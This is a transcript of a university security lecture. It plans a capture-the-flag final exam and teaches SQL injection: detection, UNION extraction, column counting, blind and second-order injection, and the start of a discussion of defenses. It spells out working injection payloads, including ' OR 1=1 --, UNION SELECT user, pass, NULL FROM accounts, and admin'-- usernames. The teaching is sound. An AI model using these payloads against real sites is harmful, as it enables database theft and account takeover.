 All right, folks, let's get started. This beautiful Wednesday morning. OK, so the first thing I'm going to talk about is a scary thing. Who likes taking finals and exams? Who likes grading finals and exams? Watch out. He's my TA member in class, so I think he's buttering me up. Sideways is saying he definitely likes grading finals. All right, so here's what we're thinking. I want to get your feedback. Instead of having a final exam, we'll do a final CTF, a capture the flag. So the idea will be, so for those that don't know, a capture the flag is basically every team that participates is going to have their own system. You each have some Linux machine. Every system is running the same number of services, like a website and some custom software that we've written. The important thing is everybody's running the exact same copies. And so the idea is what your team has to do is to hack into everyone else, find the vulnerabilities in the services, exploit those vulnerabilities in order to steal a flag, which proves that you actually broke this service and this vulnerability. So there's a central system, we call it the score bot, who is continually going and setting flags every x minutes, like two minutes, five minutes, whatever. Then this way, let's see if I can throw a little flag. Yes, pretty good flag, right? So your team, yay. So you exploit this system, you steal this flag, and then you submit it to the scoring system, which says, oh hey, this is the flag for team, this is the flag for team not lead. That means you must, in order to get this flag, you must have broken this service, right? This service, let's say web, is the only one who can access this flag, which means that if you broke this service, if you have this flag, this means that you broke this service, right? And so I can give you points for it. So at the end of it, so there'll be a score board, which will show all the teams and their score, right? And the score is based on the, how do you spell? 
You spell pass. You spell check. It's not part of the handwriting, I'm finding. And so we will set this up so that we can play a final, a CTF during the final. So some of the things this will require, a laptop or a computer, if you do not have one. So A, let's talk about teams. So I'm thinking max six people, because otherwise it gets, there's too many people. It's an unfair advantage of having too many people. So maximum six people, no minimum, if you want, I mean, zero would be a minimum, right? It doesn't make sense. Does that mean we can register a team with no participants? No, it's a minimum one, let's say. Again, in our service they have a structure, right? So maximum six people, a minimum of one person. You can create your own teams, do whatever you want. One thing that I would maybe suggest is you're all working on different projects, right? Different kinds of defenses or offensive tools for different types of vulnerabilities. So if you try to diversify your team so that people are experts in different types of vulnerabilities, you're going to improve your chances of doing well. And the other thing is on your server, right? You can actually apply whatever defenses you will have root on this server. So you can do whatever defensive techniques you want to do, which include using your projects on the final CTF to protect your system or to help you exploit, if there's a format for your vulnerability, to help you exploit that. That's the high level idea. What do you think? Thoughts? Would you like the assignments or the time that you are? Yes. Yes, would you like assignment three for the time of the, well, it would be like assignment three, except you all are trying to hack each other, not one central thing. Do you want to do it for a week? No, we'll do the day of the final for the final time. I'll also leave it open for a while so you guys can still play with it. That would be totally fine with me. 
Yeah, but at least we'll do it day of, because I don't know, do you want to do, we could do like an eight hour thing. I feel like it's, because I think our final is on Monday of finals week, so that's a little bit of much to ask of teams, right? Normally it's like six or eight hours. Yeah, a normal CTF is eight, and we're from eight, eight is your to the minimum eight to like 48 hours. And that gets crazy if you have to like, sync up sleep schedules. And actually the best thing to do is get people under time zones so you're constantly working on problems. But yeah, we'll just schedule it just for the time. And I'll try to, this makes it tricky, I have to adjust the challenges and the services such that they're doable within that time frame, right? Other questions? Yeah, you already asked one. Where does web apps or binary? Both. No, both. Yeah, so you gotta think that you have to access these through a network, right? So everything will be networked. There will be either binary applications, which are networks or web applications, which obviously are network-created. So it'll be a mix of both, right? So that way it gives you incentive to prepare your web skills since we don't have a final on that, yeah. Who thinks that actually won't be possible? They won't be possible. It won't be possible. No, it won't be possible. No. Because I'm creating this network, so I will make sure that none of that was nonsense. Hopefully none of the nonsense I taught you can be used. If you find another nonsense that can be used, you should let me know. You are allowed to use all the open source tools. Yeah, anything you want. You can install whatever you want on the systems. I'll try to give you access, like at least a day or two before the actual final CTF, so that you can go in and configure things on your server. But you won't know the services that are running yet, right, until the day of, because that's kind of the puzzle. We don't want to release those early. Yeah. 
So will we have to determine what those services are or will we have some kind of list or? It will be in a standard format. So yeah, I'll probably work with Psy to get like a list of things that you do and things that you need to know, right? Once you get on the box, where are the services? Where, how do I restart services, right? If I want to patch them or something. How do I, what are these other services? Like what are the whole IP range of all the other teams? Right, what are the ports of the services? Those kind of things. Yeah. I assume that we pull in the systems and make sure the services are still alive on our box. We do that. Cause we can just walk it out and I think we'll be able to sort of get in. Right, yeah, right. So one defensive strategy is, well if you don't want anybody to hack you, you just shut down on your services, right? Like perfect defensive score. Fuck, that's super lame, right? Because well then, it defeats the purpose of the game, right? That's like, you think about game theory, well it's in everybody's best interest to shut down their services and so everybody shuts them down and so nobody can play, right? So continuously, yes, there will be a system that is constantly interacting with each of the services. So it actually goes back to patching, right? You can't just patch something by like wiping out all of the functionality of your application, right? The application still needs to function, you just need to patch that vulnerability. So yes, periodically the score bot will be actually checking each of these services and we do it in such a way that you can't distinguish who it's coming from, right? Because we're the game network. I can actually make it appear that I'm coming from one of the other teams, but really it's me, yeah. Well we know how many people have violated our services. Maybe, it depends on how much work I wanna do on the scoreboard. So by default, let's say no, but maybe as time goes on, right? 
But you do have root on here, you can TCP dump and see the traffic that's going on so you can see what's happening to your system. Maybe you can identify somebody else's exploit to reverse engineer it or to use it against them. Yeah? You have some kind of just example of how it all, I mean, kind of works, you know? Yeah, my hope is, I'm hoping at least, well, let's say by next Wednesday, because that's at least four, that's what, a little less than a week beforehand, I do wanna give you access to like a mini test network that hopefully we can do like a practice run with. So depending how we do on content, say one, make sure you get through cross-site scripting and SQL injection. Depending on how we do, maybe next Friday, like the last class, we'll do an in-class practice run of CTF with like dummy services or maybe project assignment three services. So that way you already kind of know how to exploit that. Yeah, that way we can get familiar with getting on there because you have to worry about SSHing in there and port forwarding and copying things. So, any other questions? So should we give this up? Do you wanna go back to that exam? Unrelated? Well, you said, I don't know about the top of my head, no. Let's get started. All right, I'll send out more details soon so we can make sure we do this. So, yeah, let's aim for teams by, let's say a week from now, like next Wednesday, I wanna know all the teams, so I will announce how to tell us that so I don't get tons of emails. Yeah, so self-organized, fine teammates, all that kind of good stuff. Or don't if that's your style. Maybe I'll use this diagram. Okay, so we talked about SQL injection vulnerabilities. So what is at the core of a SQL injection vulnerability? What does it allow, what fundamentally can attack, what's the cause? The cause is user input, in what way? Is every user input? What causes user input to? I think that means this is the input. What state is it? The query that you're meeting with the... 
So essentially, the fundamental problem is that an attacker can alter the SQL query that we're making to our server, the SQL server. That's fundamentally the problem. If it was not possible for an attacker to alter the query, then there would be no SQL injection vulnerability. So how do we identify these? How can we identify SQL injection vulnerabilities? Let's look at, say, buffer overflows. How do we identify buffer overflow vulnerabilities? By looking at the variables. By looking at what about the variables? If their input is exceeding their buffer size. Right, so if some of our input was copied into another buffer, and either we get to control the length or the length was unbounded. What about without looking at the source? How could you figure out a buffer overflow vulnerability without looking at the source? Yeah, you take all the ways it gets input and just try throwing a bunch of input into them, right? So those are two different ways. What are the two different ways there? Right, so one way we're looking at the source code to find the vulnerability, or even looking at the assembly code if we're super leet, right, to try to find the vulnerability. And the other way is just throwing input at it without looking at the source code. So in web applications, can we get the source code of the web application? Yeah, not completely, and oftentimes not at all, right? I mean, this is actually how the web works, right? We make a request, something happens, and it spits back an HTML page. We don't know what code ran to execute that request. It could have been anything. So in the web, we're actually more interested in how we identify vulnerabilities without being able to access the source code. Right, yeah.
So if you send certain data to web pages and you get an internal server error, would that be one? Yeah, that could be one, right? That would be the analogy to the segfault, right? You send some data and you are looking for a server error. But that's kind of the general way of how to do it. Specifically, how do I do that for SQL injection vulnerabilities? Put in a tick mark. Put in a tick mark and it'll do what? It'll create an invalid query and execute it, and oftentimes it will send back the SQL error. Yeah, so by putting in a single tick, right, we are now generating an invalid SQL query. Guys, guys, okay. So basically one of the ways is we wanna try to trigger a fault, right? And we can do that by making the SQL query invalid. This is what we can consider a negative approach, negative in the sense that we're trying to get the program to fail, right? If the program fails when we pass in a single tick, then we know that there must be something wrong with this program. It is probably using this input in a query and something went wrong. If we're really lucky, we'll actually get the SQL error message that says, hey, there was an error in your query, there was an extra tick here. If we're not lucky, we may just get a 500 error that says, hey, something bad happened, right? But here I can try: if I pass in, you know, admin for a user and I get back a 200, but I pass in a tick and I get a 500, then that means there's probably a SQL injection vulnerability somewhere. So now the opposite. What would be a positive approach? By saying and one equals one. And one equals one. So yeah, why would that be a positive approach? Let's think about it this way. Will it cause the query to fail? Yes.
Or sorry, sorry, that's a good one. Will it cause an invalid query to be issued? And one equals one? Well, you may have to add comments too. And that depends on the tick, right? We may want tick and one equals one. So you're saying we want the result to change, like returning zero rows instead of however many rows before, but the query is still a valid SQL query, right? Exactly, yeah. What about and one equals two? So we know that username equals the valid username and one equals two is false. If that one fails, then we can tell. Yeah, while the first one is working fine. But how do we know it's actually a username, right? We may not know what it's actually testing for, right? I mean, because it could concatenate things. We may not know, but yeah, that's the general idea. Here's another way, as an example. Let's say we just search for something with an ID, like select star from users where ID is a parameter, right? So if I pass in 17 plus five, that should return no users if it was properly escaped, right? It's gonna look for a user with the literal ID of 17 plus five. But if it's not escaped, then it's gonna return me the user who has ID 22, because SQL will do that addition for me, right? So the idea is you're trying to find different behavior from the system, but not an error about the SQL query. You want something that actually shows that the SQL server is processing your input. Okay, so we saw how we can maybe use the tick or one equals one to bypass some login mechanisms, right? Essentially there we can make any query true. But how do we actually get data back? We want to be able to extract data from the server, from the database, right? I kind of sold SQL injection vulnerabilities on the promise that you can download the entire database, you can get all the information from the database, right?
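The two probing styles described above, the negative one (break the query with a tick) and the positive one (send input like 17+5 that stays valid SQL), can be sketched roughly as follows. This is only an illustration: it uses Python's built-in sqlite3 as a stand-in database, and the `users` table and the `lookup_vulnerable`, `lookup_safe`, and `probe` names are made up for the example, not something from the lecture.

```python
import sqlite3

# Stand-in database with two users, IDs 17 and 22 (hypothetical data).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)", [(17, "alice"), (22, "bob")])

def lookup_vulnerable(user_id):
    # Hypothetical vulnerable handler: input is pasted straight into the SQL text.
    query = "SELECT name FROM users WHERE id = " + user_id
    return [row[0] for row in conn.execute(query)]

def lookup_safe(user_id):
    # Parameterized version: the input is only ever treated as a value.
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in rows]

def probe(lookup, payload):
    # Mimics what we see from the outside: a result page or a server error.
    try:
        return lookup(payload)
    except sqlite3.Error:
        return "server error"

for payload in ("17", "'", "17+5"):
    print(repr(payload), probe(lookup_vulnerable, payload), probe(lookup_safe, payload))
```

In this sketch the vulnerable handler errors out on the tick and returns the user with ID 22 for 17+5, while the parameterized handler returns no rows for either payload. That difference in behavior is the signal we are looking for.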
But if we're just setting a query to be true, how do we actually do that? The idea comes in with the union operator. So anybody who's very familiar with databases want to tell us what the union operator is used for? Combine what? Yeah, combine multiple queries into the same result, right? So the idea is the union operator merges the results of two separate queries. So we can say, hey, select ID from, well, that's not a good example, huh? Coming up with database examples on the fly is apparently not my forte. Let's see if I have examples. Here we go, okay. So here I'm selecting repeat of A, one. Repeat is a SQL function, so this will just repeat A once. So that returns A, union select repeat of B, 10 times. So the result is going to be A and then 10 Bs, right? And it's going to return all of those A's and B's as if it was one query. And the very important thing here is that the queries need to have very little relation to each other, right, so I can select from users and I can union that with a select from customers and union that with a select from the product table. And so we can actually use this. Oftentimes we're going to be inside a select statement where we can alter the SQL query. And remember, the important thing is wherever we can inject, we can't change anything that comes before it. We can only change the part of the query that comes after that point. So say the original query is something like this: select ID, name, and price from products where brand is equal to tick, B, tick, right? This is easily something that developers write literally all the time.
Yeah, honestly, you can do GitHub searches for something like select, then a wildcard, where something equals a dollar sign underscore GET, to look for who's using the GET global variables inside these strings, and you'll find a lot of stuff, because everything is terrible. So here, if I do tick, or one is equal to one, dash dash, what's this query going to return? It's going to return a blank row. Tick or one equals one dash dash. Yeah, it's going to return everything, right? It will return every product in the database. Which is good, right? I mean, that could be information that we want as attackers. But do we really care about the products? I mean, we can just scrape their webpage and view all their products anyways, right? What do we care about? Users, credit cards. Yeah, we want to get other information from the database that we shouldn't really have access to. So our goal is to add a union clause after here that unions with rows from other tables. So we can union this with a select of, let's say, ID, username, password from users. Then it will first fetch all the products from the product table, then it will fetch all the users from the user table, concatenate those results together, and return it all. And wherever this is being used in the web output, like let's say this gives us a list of products, it actually gives us the list of products plus new products that are really users. What about tables, so like you're querying what all the tables are in the database typically? Yes, yes, I think it's a database-dependent technique, if I recall correctly. It changes from database to database, but I don't recall it all offhand, I mean from Oracle to MySQL to SQLite. Right, so if you already know the tables that you wanna get to, you can use this.
But yeah, you can also use meta information that the database has, and query that to say what databases do you have, what tables do you have, or what are the schemas of those tables. Right, so we can actually include that in here. So the idea here is, if we modify the query, if we pass in as B: foo, tick, union, something, then it becomes select ID, name, price from products where brand is equal to foo, union select user, pass, null from accounts, dash dash. So why do I pass in null as a third column here? Yes, so I said that the select queries are distinct. They're distinct except that they must return the same number of columns. So basically this says we need three columns. Up here it's ID, name, price, and down here we're saying the three columns are user, pass, and null. And so, okay, does this mean that now we're kinda screwed, that we have to know exactly the structure of the query? I think they also have to match type. Yes, so that's the other thing, the types actually have to be the same, right? Or I think it depends on the database system, actually. So yeah, the types may need to be the same, like you may not be able to use an int where the original uses a string. The nice thing about null is that null is type compatible with everything, right? So we can use null here. And so there's two problems here, right? We need to know beforehand the structure of the query, what does the query look like? And we need to know the names of the table we want and its columns. But we don't know this from the outside, right? All we know is we found a SQL injection vulnerability, and we're relatively confident that it's being used in a select statement. We passed in a tick for the brand and we saw it crash, right? And then we passed maybe tick, space, or one is equal to one, dash dash, and that caused it to return all of the products.
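To make the payloads above concrete, here is a minimal sketch of the brand query being injected three ways: the tick or one equals one payload, the union with a null-padded select from accounts, and a union against the database's own metadata. It assumes Python's built-in sqlite3 as a stand-in, so the metadata table is SQLite's `sqlite_master` rather than anything Oracle or MySQL specific, and the table contents and the `search_by_brand` function are invented for the example. SQLite is also loosely typed, so the type-matching constraint mentioned above does not show up here.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE products (id INTEGER, name TEXT, price REAL, brand TEXT);
    INSERT INTO products VALUES (1, 'widget', 9.99, 'foo');
    INSERT INTO products VALUES (2, 'gadget', 19.99, 'bar');
    CREATE TABLE accounts (user TEXT, pass TEXT);
    INSERT INTO accounts VALUES ('admin', 'hunter2');
""")

def search_by_brand(brand):
    # Hypothetical vulnerable handler: the brand is concatenated into the query.
    query = "SELECT id, name, price FROM products WHERE brand = '" + brand + "'"
    return conn.execute(query).fetchall()

# Makes the WHERE clause always true, so every product comes back.
all_products = search_by_brand("' OR 1=1 --")

# Appends rows from another table; NULL pads the select out to three columns.
leaked = search_by_brand("foo' UNION SELECT user, pass, NULL FROM accounts --")

# Same trick against SQLite's metadata table to list table names and schemas.
schema = search_by_brand("' UNION SELECT name, sql, NULL FROM sqlite_master --")

print(all_products)
print(leaked)
print(schema)
```

The account row shows up in `leaked` alongside the real product, looking like just another product to whatever code renders the results.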
So now we know we're good. Now we know we're injecting into a select statement. But now we want to use a union, right? So do we have to break into their website to read their source code to find out exactly what that query is? No. SQL injection vulnerabilities wouldn't be as cool if we had to do that, right? So here we have other ways. The idea is we want to be able to determine A, the number, and B, the types of the columns in the original select, right? And we can actually use this idea of testing for when things crash. So first we can do union select null, right? This query will fail, it will throw an error, if the original select statement has more than one column. But it will succeed if there's one column, right? If it fails, we try union select null, null, and then three nulls, and we just keep doing this until we finally get something that works. And I mean, that could be like 20 or whatever. You're a programmer, you can script this, right? You don't have to do this one at a time, although you can. At most what, 100, I would say, maybe? You're gonna get there eventually, right? And we can use a similar technique to determine the types of the columns. So first we have all the nulls, so now we know exactly how many columns there are. Say we found that it has three columns, and we want to detect which one is a string type. We put in a constant string, like foo, for one of the columns. If that succeeds, we know that column is a valid string type. If it doesn't succeed, then we would try maybe a 10 or some constant integer, and we could move this foo to any of the other columns. So we could try it in all possible places to identify the types of all the columns, yeah?
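Scripting the null-counting loop described above might look something like this. It is a sketch under assumptions: sqlite3 stands in for the real database, `search_by_brand` is a made-up vulnerable handler, and `request_succeeds` stands in for checking whether the page came back normally or with an error. The type-probing step is not shown, because SQLite does not enforce column types across a union, so it would never fail here.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL, brand TEXT)")
conn.execute("INSERT INTO products VALUES (1, 'widget', 9.99, 'foo')")

def search_by_brand(brand):
    # Hypothetical vulnerable handler with an unknown (to the attacker) column count.
    query = "SELECT id, name, price FROM products WHERE brand = '" + brand + "'"
    return conn.execute(query).fetchall()

def request_succeeds(payload):
    # From the outside this would be "did we get a normal page or an error".
    try:
        search_by_brand(payload)
        return True
    except sqlite3.Error:
        return False

def count_columns(max_columns=100):
    # Try UNION SELECT NULL, then NULL, NULL, and so on until one is accepted.
    for n in range(1, max_columns + 1):
        nulls = ", ".join(["NULL"] * n)
        if request_succeeds("' UNION SELECT " + nulls + " --"):
            return n
    return None

column_count = count_columns()
print(column_count)
```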
Just a quick point, what I was thinking: if the server is validating, and it's handling exceptions very well, how do you do it like this? Maybe that's what a few of you were working on, the blind SQL injection project. Yeah, so right, blind SQL injection, that's exactly what it is about: how do you do this when you get absolutely no difference between a failed query and a correct query? We'll get into this. The idea is you can still do this, right? One typical thing that they do is they'll add a sleep command, like a function call, so that it causes the SQL server to delay the response when the query succeeds versus when it fails. That's kind of the standard way of doing it, yeah? It's also positive, right? Because the query's gonna work on the nulls once you finally hit the right count. Even if it doesn't give you anything extra back, you know your original query is your baseline. But the problem is, how do you know the difference between success and failure? Success is when you get that row back. Ah, but he's talking about the case where the web application internally is using the query, but it is not externally showing any difference in behavior. Oh, so it's internal. Yeah, it catches the MySQL error and it just keeps going like nothing ever happened, right? So you have no difference between the two. That's why it's called blind: you have no way to tell success from failure, so you have to develop other tricks to do that. And it's mainly about changing the execution. But even with that, the trick there is that you can use these techniques to kind of figure out the query and the select, but actually doing a union doesn't make sense, because it never returns the results to you, right? It's blind in that sense too: A, you don't know when it fails, and B, you don't get the results.
But using the sleep technique, you get one bit of information, which says this was a valid query, or this query's condition was true. So you can use techniques that rely on just this one bit of information. You can ask questions like, is there a column? Let's see, what can you do? You can say things like, the name of the first table in the database, does it start with a letter that's greater than the middle of the alphabet? What's the middle of the alphabet? Say it's M. Is it greater than M? So you can ask that question, and if it is, then the query sleeps. If not, it won't sleep, right? So that gives you that one bit of information that says, okay, the very first character of this table's name is greater than that. And then you do a binary search to figure out exactly what that character is, and then you do the second character and the third character, fourth character, fifth character. Finally, you've gotten the whole name of the table, right? And then you can start asking about columns in that table. It's the exact same technique. And then you extract data from the table that same way. Yeah, it's really cool. I mean, you can't do it by hand. You gotta have an automated tool to do it. But once you have it, you just keep going and it can extract and download the entire database, right? So now, okay, now we know the number of columns that are expected in the select statement. And we know the types. Now, I think Eric made the point about determining the table name and the column names. So we're gonna use database-specific techniques to extract the names of the tables and the names of the columns, right? So why do these have to be database specific? Why do we want to know these? Let's go with that. Okay, sorry, new question. This is the original question I wanna ask. How do we know what database they're running? Depends on the hosting system, but odds are right now it's probably MySQL or...
Yeah, so we can guess based on the frequency, right? What other things do we use to guess? Yeah, if we saw any database errors, right? The different databases are gonna give us different error strings. Even if it doesn't tell us the query, we can probably search for the error that it gave and we would see, oh, this is a MySQL error or this is a Postgres error or an Oracle error, right? What else, yeah? Every database has its own dialect of SQL, so you can use that dialect to structure a query, and whichever query works tells you the dialect as well. Yeah, right, so SQL is the standard language, but each database system has its own dialect of SQL. It has its own functions and syntax. For instance, I believe on MySQL a hash will comment out the rest of the line, but that doesn't work in SQLite, I believe. And so you can use those kinds of things to basically detect what database system it is, right? In your injected queries, you can call what you know is a MySQL function, and if it doesn't exist in the other databases, it will fail. So yeah, there are techniques you can use to determine that. A simple scan would also tell you what kind of service someone is running. How can you scan from the outside though? I mean, you can see this service is running on port 3306. Yeah, the port, yeah, if it is 3306, you would recognize it. But how do you know from the outside? You're only talking to the web application, right? We can get the domain's IP, right? Do you think it would be a wise idea for an organization to allow you to access port 3306 externally? If people run a port scan, then they might find your port open. Yes, I totally agree. If you have that information, great, but I will say it's highly unlikely. I mean, that's a whole other level of incompetence, because your MySQL port should not be globally accessible to anyone, right? Then you could see what version they're using and see if there's a remote exploit for that, right?
You could do other cool stuff. Yeah, so often you're not going to know from the outside, because they won't tell you, right? Normally, in the web context, we assume we have access to port 80 and that's it. Aren't the other ports blacklisted, even on AWS or other Internet-facing machines? Right, yeah, so we assume they have this kind of architecture, right? We can make an external request to port 80, that does some processing somewhere, and then internally it's making a request either to a database server or to a local database on the machine, and then returning a result, yeah? With cloud services and things like that, the developer usually has to set up the database separately, so that might be a way for the hacker to try to guess their password or something like that. Yeah, if it's globally accessible, you have a host of other problems. Yeah, I would just try to brute force your password. I'm sure it's not that good, right? Just try admin, admin, database, database. So anyways, once we figure out the database, we can use these database-specific techniques. In Oracle, there's a user_objects table that we can extract information about tables from, and we can extract the names of the columns associated with each table. In MS SQL, there's a sysobjects table, with which we can do the same thing. And in MySQL, there's information_schema.tables and information_schema.columns. So this is actually kind of cool, right? Because they allow you access to this information from the SQL language itself. And the query that we're building is in SQL. So we can use SQL to query these tables and extract information about them. Okay, let's talk about this. So blind SQL injection, right? You prohibit error message displays, and it's not enough. So I guess there are levels of blind SQL injection. So let's say, like in this case, we have press releases that we can access.
It queries the database, like select title, description from press releases where ID is equal to five, and all error messages are filtered, right? So it doesn't send any error messages. So here we maybe get a 404 or a page, right? That would be the bit of information that tells us whether the query actually succeeded or not. But it's not like we can use this to extract more information directly, like in the union case. But still, look at what we get by injecting five and one is equal to one, right? So why five and one equals one? Where's my tick? They're directly inserting a number instead of a string, so you don't have to do that. That's the other key thing about SQL injection vulnerabilities. Oftentimes people only think about single or double quotes, right, and forget that what matters is how this input is being used in the SQL query. Here it's being used as ID equals this, and the developer chose not to put it in single quotes. And because of that, if you put a single quote in, you're gonna cause an invalid SQL query. So this is why I do five and one is equal to one, because that just injects right in there. There are no additional ticks needed. And so then this query gets sent to the database: select title, description from press releases where ID is five and one equals one, right? And so I'm adding and one is equal to one. Why and instead of or here? Because you already know a valid ID. Right, I already know five is a valid ID, right? If I did or one equals one, who knows what the application's gonna do when it gets back a thousand press releases, right? It's probably only expecting one back, so it could throw an error or something. So here I'm saying if it returns the exact same page with five and one is equal to one, well then I know that must be a SQL injection vulnerability, right? This is a case of reusing the positive identification technique, right?
We're saying if it does this, right? If it was properly escaping things, it would not return the same page, right? It would not return the same press release. It would look for a press release with an ID of "5 AND 1=1", which is clearly not a valid ID. Okay, so if there's a SQL injection vulnerability, then the same press release should be returned. Otherwise, if the input is validated, right, if it's sanitized, then "5 AND 1=1" should be treated as the value of the ID. So the idea is we always know 1=1 is true, and so we can inject other statements in its place. So yeah, we can ask questions of the server, right? We can say 5 AND username = 'hacker', right? So if it returns false, well, it's not really giving me a lot of information. It's telling me that the username is not hacker, which is not great information, right? But if it returns true, hey, I've guessed the username, right? And so by making complex questions, right, we can do binary search, we can ask interesting questions of the database system to extract information bit by bit from the system. We can say, yeah, so here we'd say id = 5 AND SUBSTRING(username, 1, 1), so get the first character of the username, is it less than, let's say, this ASCII value? And so whether that returns true or false tells me information about this value. Okay, the other really cool part about SQL injection vulnerabilities. So oftentimes when we're testing these things, right, we think, okay, input we give to the application goes into the database, used in a SQL query, right? Goes into the database means used in a SQL query. So if that happens incorrectly, or the input is not sanitized, then we can have a SQL injection vulnerability, right? So that's data coming directly from the user and then going into the database.
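Stepping back to the bit-by-bit extraction for a moment, here is a minimal sketch of how the true/false page behavior can be turned into a binary search. It is not the lecture's code: it assumes Python with an in-memory SQLite database standing in for the site, and the names page_exists, leak_int, and leak_username, the table layout, and the sample data are all hypothetical. SQLite spells the functions substr and unicode where the lecture says substring and ASCII value.

```python
import sqlite3

# Hypothetical stand-in for the vulnerable site: an in-memory SQLite database.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE press_releases (id INTEGER PRIMARY KEY, title TEXT, description TEXT);
    INSERT INTO press_releases VALUES (5, 'Q3 results', 'Numbers went up.');
    CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT);
    INSERT INTO users VALUES (1, 'hacker');
""")


def page_exists(id_param: str) -> bool:
    """Vulnerable handler: pastes the raw parameter into the query, unquoted.

    Errors are swallowed, so the caller only learns "page" or "no page".
    """
    query = "SELECT title, description FROM press_releases WHERE id = " + id_param
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False


def leak_int(sql_expr: str, upper: int) -> int:
    """Binary-search the integer value of sql_expr using only true/false answers."""
    lo, hi = 0, upper
    while lo < hi:
        mid = (lo + hi) // 2
        # Known-valid ID 5, plus a question the database answers for us.
        if page_exists(f"5 AND ({sql_expr}) <= {mid}"):
            hi = mid
        else:
            lo = mid + 1
    return lo


def leak_username() -> str:
    """Recover the first username one character at a time."""
    target = "(SELECT username FROM users LIMIT 1)"
    length = leak_int(f"length({target})", 64)
    codes = [leak_int(f"unicode(substr({target}, {i}, 1))", 127)
             for i in range(1, length + 1)]
    return "".join(chr(code) for code in codes)
```

Each character costs about seven requests here, since the search halves the range 0 to 127 each time. Against a real site the only change would be that page_exists makes an HTTP request and compares the response to the known-good page.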
But what if they properly sanitize the data when it's going into the database, but then later, in a subsequent query, they read that data back and use it unsanitized in a new query? Like, let's say in the course submission system, right? Let's say I wanted to find all users with similar names or something, right? Let's say I was safe when I stored all your names, so they could have ticks or whatever in them, right? But then let's say I wrote my query as, well, first select all the usernames from the database, then create a new query to select all other users that have the same username, right? And the ID is not your ID, right? So look for other people with similar usernames, right? Here I'm using data from the database that originally came from the user, which is untrusted, unsanitized. It just happened that I was safe when it was coming in, but the second time I'm using it, it's not safe. So the idea is that SQL code, a SQL injection attack, is injected into the application, but that SQL statement isn't invoked until later in the program, when the application uses that data. And it could be, you know, it could be anything: when a cron job runs, on a guest book page, on a statistics page, anything like that, right? So you could have a guest book where guests write comments, and then a statistics page that shows how many people are writing comments. So the idea is, right, when you escape single quotes while putting the data into the database, you still have single quotes in the data in the database, right? When the application pulls that data out and uses it, it came from the user, it's untrusted. So the attacker can set their username to something like john'--, right? So the application, when it inserts it into the database, safely escapes that tick by putting a backslash there. But at a later point, the user changes their password, and the query uses that username from the database.
So it says UPDATE users SET password = whatever WHERE username = 'john'--', right? So now I've changed John's password, even though my name was john'--, right? So I can make a name of admin'--, right, to be able to change the admin's password and then log in as admin. Let's look at an example. So here's a register page. So here we're starting a session in PHP. We have the SQL query INSERT INTO users (username, password) VALUES with the name and the password, right? And we're using the mysql_real_escape_string function, which is how you do validation and encoding with MySQL in PHP, right? So we run this query, we check the result, and then we set the ID into the session, right? So here we've properly built the query, right? This is 100% safe. There's no way they can change the query that we intended to send to MySQL, right? There's no way they can change the structure of that SQL variable. But now on the change password page, let's say I have a new password, and I select the username and password from users where the ID is the ID in the session, right? And that ID was set by us. So A, it's stored on the server, so the user can't control it. B, it's just an integer, so it's gonna be safe. So we did not call mysql_real_escape_string here, right? We know it should be safe because the user should never touch it, but maybe we should add it here anyway just to be extra sure, just in case. So then I fetch this result from the database, right? So I do this initial query, I get the result back, and then I run a query to UPDATE users SET password equal to mysql_real_escape_string of the new password, right? And here I'm being really careful. This new password came directly from the user, right? I need to escape it before I put it into the database. But I just got this username back from the database, so what's the problem with inserting it directly in here? And then I issue this query, right?
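The register and change-password flow just described can be sketched roughly as follows. This is an illustration, not the PHP from the slides: it assumes Python with an in-memory SQLite database, and escape, register, change_password, and password_of are hypothetical helpers. SQLite escapes a tick by doubling it rather than with a backslash, so escape plays the role of mysql_real_escape_string only by analogy.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
)


def escape(value: str) -> str:
    """Hypothetical stand-in for an escaping function (SQLite doubles the tick)."""
    return value.replace("'", "''")


def register(username: str, password: str) -> int:
    """Safe on the way in: both user-supplied values are escaped."""
    cur = conn.execute(
        "INSERT INTO users (username, password) "
        f"VALUES ('{escape(username)}', '{escape(password)}')"
    )
    return cur.lastrowid  # the caller would store this ID in the session


def change_password(session_user_id: int, new_password: str) -> None:
    """Second-order bug: the username read back from the database is trusted."""
    row = conn.execute(
        f"SELECT username FROM users WHERE id = {int(session_user_id)}"
    ).fetchone()
    username = row[0]  # still attacker-controlled data, ticks and all
    conn.execute(
        f"UPDATE users SET password = '{escape(new_password)}' "
        f"WHERE username = '{username}'"  # unescaped: the tick ends the string
    )


def password_of(username: str) -> str:
    """Helper for inspecting the result; uses a bound parameter."""
    row = conn.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row[0]


admin_id = register("admin", "s3cret")
attacker_id = register("admin'--", "attacker-pw")
change_password(attacker_id, "pwned")  # attacker changes "their own" password
```

After the last call, the row that actually changed is admin's, because the stored username closes the quoted string and comments out the rest of the UPDATE. The attacker's own row is untouched.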
So the key thing about second-order SQL injection vulnerabilities is that they could be nth order, right? There could be any number of steps where the data is used and put into some other database, or put into another table or something, right? But the core idea here is that just sanitizing things as they come in is not always enough, right? That data could still be, we like to think about it as, tainted, right? Anything that comes from the user is evil, bad, tainted, until we make it good by calling this mysql_real_escape_string, right? So we make it good to insert once, right? But if we ever use that data again, it's still tainted, it still came from the user. Okay, so how do we solve SQL injection vulnerabilities? Parameterized queries? What are parameterized queries? So you have, like, placeholders in the query for all the real values. Yeah, so really fundamentally, right, our goal as developers, in order to never allow SQL injection vulnerabilities, is that we cannot let client-side data, data that comes from the user, modify SQL statements, right? This is the core SQL injection vulnerability problem, right? One way to do that is by using stored procedures, right? So stored procedures are a way to isolate the application from SQL. They actually are a way that you tell the SQL server, hey, or actually, sorry. Yeah, I was getting confused between stored procedures and prepared statements. So what was the one you said? Parameterized queries. Parameterized queries, yeah, like prepared statements. Okay, so stored procedures, right? In some databases you can put functions into the SQL server, and then you can just call those functions from your application, right? So this way, your application doesn't build up SQL queries. All the SQL statements that your application requires live in functions that are defined in the database, and it just 